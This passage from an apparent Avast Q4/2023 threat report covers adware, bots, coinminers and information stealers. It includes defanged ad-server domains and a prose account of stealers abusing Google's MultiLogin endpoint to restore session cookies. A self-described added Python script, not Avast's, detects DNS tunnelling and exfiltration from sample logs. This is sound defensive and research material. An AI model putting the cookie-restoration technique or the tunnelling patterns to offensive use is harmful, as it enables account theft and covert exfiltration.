3437. <p>Adware actors exhibit high flexibility, continuously adjusting their techniques to evade antivirus detection. As a result, it becomes imperative to remain dynamic and consistently adapt to the evolving strategies employed by these actors. The graph below illustrates adware blocks over Q3 and Q4 of 2023. These blocks cover a diverse array of techniques that we actively block and respond to in order to counter the evolving threat of adware – the ongoing cat-and-mouse game.</p>
  3438.  
  3439.  
  3440. <div class="wp-block-image">
  3441. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-1024x404.png" alt="" class="wp-image-7949" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global Avast risk ratio from adware for Q3/2023 and Q4/2023</figcaption></figure></div>
  3442.  
  3443.  
3444. <p>The global risk ratio of adware in Q4 2023 was similar to that of the previous quarter. Nevertheless, the prevalence of desktop adware remains significantly elevated. The most affected regions remain South America, Africa, Southeast Asia, and Southeast Europe, as the map below illustrates.</p>
  3445.  
  3446.  
  3447. <div class="wp-block-image">
  3448. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-1024x639.png" alt="" class="wp-image-7976" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Map showing the global risk ratio for Adware in Q4/2023</figcaption></figure></div>
  3449.  
  3450.  
  3451. <h6 class="wp-block-heading">Adware Share</h6>
  3452.  
  3453.  
  3454.  
3455. <p>One of the more sophisticated adware techniques is switching the DNS records of ad servers, which are characterized by remarkably short TTLs. This makes it impossible to pinpoint the precise adware strain behind them. The most prevalent DNS records of ad servers in Q4/2023:</p>
  3456.  
  3457.  
  3458.  
  3459. <ul>
  3460. <li>agriculturalpraise[.]com</li>
  3461.  
  3462.  
  3463.  
  3464. <li>formationwallet[.]com</li>
  3465.  
  3466.  
  3467.  
  3468. <li>plundertentative[.]com</li>
  3469.  
  3470.  
  3471.  
  3472. <li>supportedbushesimpenetrable[.]com</li>
  3473.  
  3474.  
  3475.  
  3476. <li>nutsmargaret[.]com</li>
  3477.  
  3478.  
  3479.  
  3480. <li>facilitypestilent[.]com</li>
  3481.  
  3482.  
  3483.  
  3484. <li>suchbasementdarn[.]com</li>
  3485.  
  3486.  
  3487.  
  3488. <li>usetalentedpunk[.]com</li>
  3489. </ul>
  3490.  
  3491.  
  3492.  
3493. <p>Consequently, a substantial share of adware, 54%, falls into the category of unknowns. The remaining shares are distributed among other adware strains in the following manner:</p>
  3494.  
  3495.  
  3496.  
  3497. <ul>
  3498. <li>SocialBar (38%)</li>
  3499.  
  3500.  
  3501.  
  3502. <li>DealPly (2%)</li>
  3503.  
  3504.  
  3505.  
  3506. <li>Neoreklami (1%)</li>
  3507. </ul>
  3508.  
  3509.  
  3510.  
  3511. <p class="has-text-align-right"><em>Martin Chlumecký,&nbsp;Malware Researcher</em></p>
  3512.  
  3513.  
  3514.  
  3515. <h3 class="wp-block-heading">Bots</h3>
  3516.  
  3517.  
  3518.  
  3519. <p><em>Bots are threats mainly interested in securing long-term access to devices with the aim of utilizing their resources, be it remote control, spam distribution, or denial-of-service (DoS) attacks.</em></p>
  3520.  
  3521.  
  3522.  
3523. <p>In comparison to the previous quarters, this quarter was a roller-coaster with many changes in the landscape. The dust hadn’t even settled on Qakbot’s former infrastructure following its FBI takedown in August 2023 before we witnessed its resurgence in December. The number of our users targeted by Qakbot doubled in Q4 2023 compared to the previous quarter. While this seems to be a significant increase, it is still dwarfed by its activity before the takedown. Its binaries also went through an overhaul, embracing 64-bit architecture and relying on AES instead of XOR for string encryption. Interestingly, a rather new strain, Pikabot, exhibited overlaps in distribution-related TTPs (thread hijacking and second-stage retrieval) with Qakbot, and it was, incidentally, also gaining traction in the landscape, doubling the number of affected users compared to the previous quarter.</p>
  3524.  
  3525.  
  3526.  
3527. <p>Phorpiex’s successor, dubbed Twizt, expanded its payloads this quarter. Aside from spam/sextortion payloads, we’ve seen previously unseen payloads featuring code for brute-forcing credentials to VNC (remote desktop sharing protocol) endpoints, both in the local network and at randomly generated IP addresses, looking for potentially publicly accessible endpoints.</p>
  3528.  
  3529.  
  3530.  
  3531. <p>The overall risk ratio of bots increased at the end of 2023, partially fueled by Qakbot’s resurgence in December. As for other notable changes in the strain prevalence, we’ve seen a huge drop (-48%) in Amadey infections and a steady increase in Emotet (+14%) and Twizt (+27%) infections.</p>
  3532.  
  3533.  
  3534. <div class="wp-block-image">
  3535. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7951" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio in Avast’s user base regarding bots in Q4/2023</figcaption></figure></div>
  3536.  
  3537.  
3538. <p>The last mention of bots goes to <em>NoName056(16)</em> and their DDosia project, which had a rather turbulent quarter. Presumably to hinder tracking attempts by malware researchers, the group reworked their configuration distribution protocol, including its client authentication. Nevertheless, the first implementation was unstable and riddled with software bugs in both the server and client implementations. This dramatically reduced the project’s efficacy in the short term until these blocking issues were resolved. Shortly after the deployment, the authentication protocol was simplified, and the encryption mechanism was changed soon afterwards due to reported problems with client-attribution statistics. These problems resulted in reduced rewards for the project’s participants.</p>
  3539.  
  3540.  
  3541. <div class="wp-block-image">
3542. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="443" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-ddosia-attacks-telegram-1024x443.png" alt="" class="wp-image-7952" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-ddosia-attacks-telegram-1024x443.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-ddosia-attacks-telegram-300x130.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-ddosia-attacks-telegram-768x333.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-ddosia-attacks-telegram.png 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">A moving average of DDosia’s cadence of announcements of new victims on their Telegram channel.</figcaption></figure></div>
  3543.  
  3544.  
3545. <p>As for their general operations, there were not many changes. Attacks on various European and Ukrainian banks were attempted throughout the whole quarter. While the first wave of attacks was met with some success, successive attacks rarely succeeded despite the group’s claims on their Telegram channel. The choice of targets still follows the usual <em>modus operandi</em>, meaning that new configurations were usually spurred by various politicians’ statements directed against Russia and its invasion of Ukraine. Unfortunately, the reversal of the trend in the number of DDosia project participants still holds, with the number of participants increasing linearly throughout the quarter to a little over 16,000. This quarter, the most affected TLDs were <em>.cz</em>, <em>.de</em>, and <em>.fr</em>, each accounting for more than 10% of targeted domains.</p>
  3546.  
  3547.  
  3548. <div class="wp-block-image">
3549. <figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="496" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-ddosia-members-1024x496.png" alt="" class="wp-image-7953" style="width:766px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-ddosia-members-1024x496.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-ddosia-members-300x145.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-ddosia-members-768x372.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-ddosia-members.png 1220w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Number of participants in the DDosia project</figcaption></figure></div>
  3550.  
  3551. <div class="wp-block-image">
  3552. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="512" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-ddosia-tld-attacks-1024x512.png" alt="" class="wp-image-7954" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-ddosia-tld-attacks-1024x512.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-ddosia-tld-attacks-300x150.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-ddosia-tld-attacks-768x384.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-ddosia-tld-attacks.png 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Share of TLDs targeted by DDosia project</figcaption></figure></div>
  3553.  
  3554.  
  3555. <p class="has-text-align-right"><em>Adolf Středa, Malware Researcher</em><br><em>Martin Chlumecký,&nbsp;Malware Researcher</em></p>
  3556.  
  3557.  
  3558.  
  3559. <h3 class="wp-block-heading">Coinminers</h3>
  3560.  
  3561.  
  3562.  
  3563. <p><em>Coinminers are programs that use a device&#8217;s hardware resources to verify cryptocurrency transactions and earn cryptocurrency as compensation. However, in the world of malware, coinminers silently hijack a victim&#8217;s computer resources to generate cryptocurrency for an attacker. Regardless of whether a coinminer is legitimate or malware, it&#8217;s important to follow our </em><a href="https://support.avast.com/en-eu/article/Threat-Lab-cryptomining-behavior-guideline/" target="_blank" rel="noreferrer noopener"><em>guidelines</em></a><em>.</em></p>
  3564.  
  3565.  
  3566.  
3567. <p>When compared to the previous quarter, we observed another decrease in the prevalence of coinminers in Q4/2023, with the risk ratio dropping by 14%. However, even though this is a rather significant drop, it unfortunately doesn’t mean coinminers are a lesser threat. We also observed a rather significant shift in the market share, with a decline in web miners giving way to an extensive rise of XMRig and other executable coinminers, which are, in general, more dangerous forms of coinmining.</p>
  3568.  
  3569.  
  3570.  
3571. <p>Geographically, we also observed a shift during Q4/2023, with attacks becoming more concentrated in specific countries, which lowered the global spread in terms of risk ratio.</p>
  3572.  
  3573.  
  3574. <div class="wp-block-image">
  3575. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1024x639.png" alt="" class="wp-image-7955" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Map showing global risk ratio for coinminers in Q4/2023</figcaption></figure></div>
  3576.  
  3577.  
3578. <p>First and foremost, we measured two huge increases in risk ratio in the United States and Turkey, by almost 250% and 200%, respectively. We measured further significant surges in Hungary, Poland, India, and Egypt, where the risk ratio increased by 85%, 52%, 50%, and 40%, respectively. On the other hand, users in France and Belgium were less prone to getting infected with coinminers, with the risk ratio decreasing by 80% and 78%, respectively.</p>
  3579.  
  3580.  
  3581.  
3582. <p>In the graph below, we can observe the risk ratio of encountering coinminers in the United States skyrocketing.</p>
  3583.  
  3584.  
  3585. <div class="wp-block-image">
  3586. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7956" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Daily risk ratio in our user base in US regarding coinminers in Q4/2023</figcaption></figure></div>
  3587.  
  3588.  
3589. <p>As we mentioned before, this quarter shifted more towards traditional executable coinmining instead of web miners. As a result, XMRig now has a dominant malware share of 64% in total, a huge 169% increase this quarter. The malware share of web miners fell by 68% to 19%, a long-time low.</p>
  3590.  
  3591.  
  3592.  
3593. <p>In general, we consider this a more dangerous threat than web miners, since XMRig and other executable strains usually run in the background of the whole system, not only on the visited webpage. Furthermore, coinminers tend to be bundled with other malware types as well, meaning the scope of the infection might be even bigger in these cases.</p>
  3594.  
  3595.  
  3596.  
  3597. <p>The most common coinminers with their malware share in Q4/2023 were:</p>
  3598.  
  3599.  
  3600.  
  3601. <ul>
  3602. <li>XMRig (63.69%)</li>
  3603.  
  3604.  
  3605.  
  3606. <li>Web miners (19.20%)</li>
  3607.  
  3608.  
  3609.  
  3610. <li>CoinBitMiner (2.14%)</li>
  3611.  
  3612.  
  3613.  
  3614. <li>SilentCryptoMiner (2.04%)</li>
  3615.  
  3616.  
  3617.  
  3618. <li>FakeKMSminer (1.47%)</li>
  3619.  
  3620.  
  3621.  
  3622. <li>NeoScrypt (1.20%)</li>
  3623.  
  3624.  
  3625.  
  3626. <li>CoinHelper (0.86%)</li>
  3627. </ul>
  3628.  
  3629.  
  3630.  
  3631. <p class="has-text-align-right"><em>Jan Rubín, Malware Researcher</em></p>
  3632.  
  3633.  
  3634.  
  3635. <h3 class="wp-block-heading">Information Stealers</h3>
  3636.  
  3637.  
  3638.  
  3639. <p><em>Information stealers are dedicated to stealing anything of value from the victim’s device. Typically, they focus on stored credentials, cryptocurrencies, browser sessions/cookies, browser passwords and private documents.</em></p>
  3640.  
  3641.  
  3642.  
3643. <p>Q4/2023 brought a new and interesting stealing capability which was rapidly adopted by information stealers – abusing a Google OAuth endpoint for recovering authentication cookies. <a href="https://www.linkedin.com/posts/alon-gal-utb_an-upcoming-update-to-lumma-infostealer-is-activity-7128433924380213248-hcEG/" target="_blank" rel="noreferrer noopener">Lumma</a>, for example, a rapidly rising malware-as-a-service (MaaS) stealer, was supposedly the first to advertise and adopt the technique.</p>
  3644.  
  3645.  
  3646. <div class="wp-block-image">
  3647. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="858" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore-1024x858.png" alt="" class="wp-image-7957" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore-1024x858.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore-300x251.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore-768x643.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore-1536x1286.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore.png 1600w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Lumma info-stealer changelog (Source: <a href="https://www.bleepingcomputer.com/news/security/malware-dev-says-they-can-revive-expired-google-auth-cookies/" target="_blank" rel="noreferrer noopener">BleepingComputer</a>)</figcaption></figure></div>
  3648.  
  3649.  
  3650. <p>Many big information stealer groups, including MaaS players, have already jumped on this new threat. This includes (but is not limited to) Rhadamanthys, Stealc, Meduza, and MetaStealer.</p>
  3651.  
  3652.  
  3653.  
3654. <p>The technique abuses a Google OAuth &#8220;MultiLogin&#8221; API endpoint. This endpoint is used for synchronizing accounts across Google services. When the malware decrypts a session token and Gaia ID from the local browser files on the infected device, it is further able to perform a request to the “MultiLogin” API endpoint, recovering the authentication cookie. Note that when this “token and ID” pair is exfiltrated rather than used directly from the victim’s system, the malware authors may use this information on their backends instead, trying to avoid AV and EDR monitoring.</p>
  3655.  
  3656.  
  3657.  
3658. <p>Currently, the mitigation is rather limited. According to <a href="https://www.cloudsek.com/blog/compromising-google-accounts-malwares-exploiting-undocumented-oauth2-functionality-for-session-hijacking" target="_blank" rel="noreferrer noopener">CloudSEK</a> researchers, the authentication cookie survives even a (sole) reset of the user’s password. <a href="https://twitter.com/e11i0t_/status/1740791905112490061" target="_blank" rel="noreferrer noopener">In fact</a>, if a user was affected, they first need to log out of their Google account to revoke the synchronization OAuth cookie (or sign out of / terminate all active sessions: <a href="http://g.co/mydevices" target="_blank" rel="noreferrer noopener">http://g.co/mydevices</a>), change the password, and log back in.</p>
  3659.  
  3660.  
  3661.  
3662. <p>Unfortunately, these are all reactive steps in the sense that the user needs to know that they were affected. The problem is further underlined by the fact that <a href="https://www.bleepingcomputer.com/news/security/google-malware-abusing-api-is-standard-token-theft-not-an-api-issue/" target="_blank" rel="noreferrer noopener">Google currently doesn’t plan</a> to rework the “MultiLogin” endpoint or mitigate the API abuse by proactive means.</p>
  3663.  
  3664.  
  3665.  
  3666. <h6 class="wp-block-heading"><strong>DNS-based threats</strong></h6>
  3667.  
  3668.  
  3669.  
  3670. <p>The Domain Name System (DNS) is a decentralized naming system that translates user-friendly domain names into numerical IP addresses for network devices to identify each other. However, this system is now becoming popular for carrying out attacks. Usually, threat actors misuse DNS for these reasons:</p>
  3671.  
  3672.  
  3673.  
  3674. <ul>
  3675. <li>The malware can receive commands and instructions, enabling two-way communication</li>
  3676.  
  3677.  
  3678.  
  3679. <li>The threat actor can deploy an additional payload onto the infected device</li>
  3680.  
  3681.  
  3682.  
  3683. <li>Information stealers can exfiltrate sensitive data from the infected device</li>
  3684.  
  3685.  
  3686.  
  3687. <li>The communication is more obfuscated, rendering it more difficult to track properly</li>
  3688.  
  3689.  
  3690.  
  3691. <li>The communication is usually allowed by default, since the traffic operates on the common port 53</li>
  3692.  
  3693.  
  3694.  
  3695. <li>The traffic may bypass traditional AVs and gateways due to a possible lack of monitoring and scanning</li>
  3696. </ul>
  3697.  
  3698.  
  3699.  
  3700. <p>Attackers can use many techniques to achieve this: DNS tunneling, DNS cache poisoning, DNS fast fluxing, or the use of rogue/malicious DNS servers, to name a few.</p>
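<p>As an added illustration of how a defender can spot the DNS tunneling and payload delivery described above, the following Python script (an example written for this edit, not Avast’s code or a tool the report describes) scores DNS query logs with simple heuristics: payload-capable record types such as TXT and NULL, unusually long labels or subdomains, and high character entropy in the subdomain part of the name. Per-client findings are then aggregated per base domain so that a stream of unique, high-entropy subdomains under one zone stands out. The dnsmasq-like log format, the sample lines, the placeholder zone <code>example-c2.test</code>, and the thresholds are all constructed assumptions.</p>

```python
"""Heuristic DNS tunnelling / exfiltration detector over query logs.

Added example, not Avast code. Sample log lines below are constructed,
loosely following the dnsmasq "query[TYPE] <name> from <client>" shape.
The hex-like labels under the placeholder zone example-c2.test stand in
for encoded data chunks as produced by DNS tunnelling tools.
"""
from __future__ import annotations

import math
import re
from collections import defaultdict

SAMPLE_LOG = """\
query[A] www.example.com from 10.0.0.5
query[A] cdn.example.net from 10.0.0.5
query[TXT] 4f3a9c1e7b2d6a0f8e5c3b1d9a7f2e4c.6b8d0a2f4e6c8b0d2a4f6e8c0b2d4a6f.tun.example-c2.test from 10.0.0.7
query[TXT] 9e1c3a5f7b9d1f3a5c7e9b1d3f5a7c9e.0b2d4f6a8c0e2a4c6e8a0c2e4a6c8e0a.tun.example-c2.test from 10.0.0.7
query[TXT] a7c9e1b3d5f7a9c1e3b5d7f9a1c3e5b7.2c4e6a8c0e2a4c6e8a0c2e4a6c8e0a2c.tun.example-c2.test from 10.0.0.7
query[A] mail.example.org from 10.0.0.9
query[NULL] 5d7f9a1c3e5b7d9f1a3c5e7b9d1f3a5c.tun.example-c2.test from 10.0.0.7
query[A] sso.example.edu from 10.0.0.5
"""

LINE_RE = re.compile(r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<name>\S+)\s+from\s+(?P<client>\S+)")

# Record types whose answers/names carry arbitrary payloads; frequently used by tunnelling tools.
PAYLOAD_QTYPES = {"TXT", "NULL", "CNAME", "MX"}


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; ~0 for 'www', close to 4 for random hex."""
    if not s:
        return 0.0
    counts: dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(name: str) -> tuple[str, str]:
    """Return (subdomain, base_domain). Treats the last two labels as the
    registrable domain: an approximation; production code would consult
    the Public Suffix List."""
    labels = name.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def score_query(qtype: str, name: str) -> tuple[int, list[str]]:
    """Count how many tunnelling indicators a single query trips (thresholds are assumptions)."""
    sub, _ = split_name(name)
    reasons: list[str] = []
    if qtype in PAYLOAD_QTYPES:
        reasons.append(f"payload-capable qtype {qtype}")
    if len(sub) >= 50:
        reasons.append(f"long subdomain ({len(sub)} chars)")
    longest = max((len(label) for label in sub.split(".")), default=0)
    if longest >= 30:
        reasons.append(f"long label ({longest} chars)")
    ent = shannon_entropy(sub.replace(".", ""))
    if ent >= 3.5:
        reasons.append(f"high-entropy subdomain ({ent:.2f} bits/char)")
    return len(reasons), reasons


def analyse(log_text: str, min_score: int = 2) -> dict[tuple[str, str], dict]:
    """Aggregate per (client, base domain); return only pairs with suspicious queries."""
    stats: dict[tuple[str, str], dict] = defaultdict(
        lambda: {"queries": 0, "suspicious": 0, "unique_subs": set(), "reasons": set()}
    )
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # unparseable line: skipped, not treated as evidence
        qtype, name, client = m.group("qtype"), m.group("name"), m.group("client")
        sub, base = split_name(name)
        s = stats[(client, base)]
        s["queries"] += 1
        s["unique_subs"].add(sub)
        score, reasons = score_query(qtype, name)
        if score >= min_score:
            s["suspicious"] += 1
            s["reasons"].update(reasons)
    return {
        key: {
            "queries": s["queries"],
            "suspicious": s["suspicious"],
            "unique_subdomains": len(s["unique_subs"]),
            "reasons": sorted(s["reasons"]),
        }
        for key, s in stats.items()
        if s["suspicious"] > 0
    }


def suspicious_domains(log_text: str) -> set[str]:
    """Base domains that received at least one query scoring above the threshold."""
    return {base for (_, base) in analyse(log_text)}


if __name__ == "__main__":
    for (client, base), f in analyse(SAMPLE_LOG).items():
        print(f"{client} -> {base}: {f['suspicious']}/{f['queries']} suspicious, "
              f"{f['unique_subdomains']} unique subdomains")
        for r in f["reasons"]:
            print("   -", r)
```

<p>The per-query score alone would flag the odd legitimate long CDN name, which is why the aggregation step matters: a single client issuing many distinct high-entropy subdomains under one zone is the pattern worth alerting on, and the same aggregation also surfaces the fast-flux and rogue-resolver cases when the client or the base domain field is swapped for the answering server.</p>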
  3701.  
  3702.  
  3703.  
  3704. <p>We already see threat actors adopting DNS-based techniques, including notorious malware strains. This includes information stealers like <a href="https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/" target="_blank" rel="noreferrer noopener">ViperSoftX</a> or <a href="https://decoded.avast.io/janrubin/meh-2-2/" target="_blank" rel="noreferrer noopener">DarkGate</a> (also known as Meh) for more obfuscated payload delivery, the multi-modular backdoor <a href="https://decoded.avast.io/martinchlumecky/dirtymoe-1/" target="_blank" rel="noreferrer noopener">DirtyMoe</a> for obfuscated communication, or <a href="https://decoded.avast.io/danielbenes/crackonosh-a-new-malware-distributed-in-cracked-software/" target="_blank" rel="noreferrer noopener">Crackonosh</a> for its update routine.</p>
  3705.  
  3706.  
  3707.  
  3708. <p>For further information about DNS-based threats and how we protect our users against them, read our dedicated <a href="https://decoded.avast.io/threatintel/opening-a-new-front-against-dns-based-threats/" target="_blank" rel="noreferrer noopener">blog post on Decoded</a>.</p>
  3709.  
  3710.  
  3711.  
  3712. <h6 class="wp-block-heading"><strong>Statistics</strong></h6>
  3713.  
  3714.  
  3715.  
  3716. <p>In Q4/2023, we observed a 6% increase in information stealer activity in comparison with the previous quarter. This increase is mostly due to the rise of Lumma stealer as well as Stealc, and to an increase in the activity of various online JavaScript scrapers.</p>
  3717.  
  3718.  
  3719. <div class="wp-block-image">
  3720. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7959" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Daily risk ratio in our user base regarding information stealers in Q4/2023</figcaption></figure></div>
  3721.  
  3722.  
  3723. <p>The highest risk of information stealer infections currently exists in:</p>
  3724.  
  3725.  
  3726.  
  3727. <ul>
  3728. <li>Turkey (3.01%) with 46% Q/Q increase</li>
  3729.  
  3730.  
  3731.  
  3732. <li>Pakistan (2.32%) with 6% Q/Q decrease</li>
  3733.  
  3734.  
  3735.  
  3736. <li>Egypt (1.98%) with 3% Q/Q increase</li>
  3737. </ul>
  3738.  
  3739.  
  3740.  
  3741. <p>Thankfully, we observed a significant 12% decrease in information stealers’ activity in the United States.</p>
  3742.  
  3743.  
  3744. <div class="wp-block-image">
